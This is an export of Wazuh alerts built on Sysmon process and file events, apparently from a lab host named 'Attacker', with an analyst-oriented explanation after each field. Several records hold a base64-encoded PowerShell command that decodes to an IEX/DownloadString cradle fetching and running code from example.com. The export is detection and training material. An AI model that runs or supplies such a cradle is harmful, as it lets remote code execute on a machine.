CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00}
ParentProcessId: 12012
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:21.060 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce5-680a-df0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10556 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bce1-680a-dc0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 34 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1150742 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:22.3308890Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282753 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:22.313
ProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00}
ProcessId: 10556
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_afeyzpts.2r4.ps1
CreationUtcTime: 2025-04-24 22:36:22.313
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:22.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce5-680a-df0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10556 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_afeyzpts.2r4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:22.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1153511 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:23.3718738Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282772 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:22.844
ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00}
ProcessId: 2804
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00}
ParentProcessId: 10556
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:22.844 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce6-680a-e10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2804 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bce5-680a-df0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10556 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 35 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1161578 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:23.5843071Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282774 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:23.575
ProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00}
ProcessId: 2804
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1
CreationUtcTime: 2025-04-24 22:36:23.575
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:23.575 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bce6-680a-e10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 2804 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:23.575 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1164343 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:24.7064061Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282787 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:36:24.704
ProcessGuid: {94294ddc-bcdc-680a-d70a-000000000e00}
ProcessId: 13216
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_qv3prkde.0h0.ps1
CreationUtcTime: 2025-04-24 22:36:24.699
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:36:24.704 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcdc-680a-d70a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13216 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_qv3prkde.0h0.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:36:24.699 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534222.1167048 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:36:26.9852980Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282793 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:36:24.351
ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00}
ProcessId: 14284
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
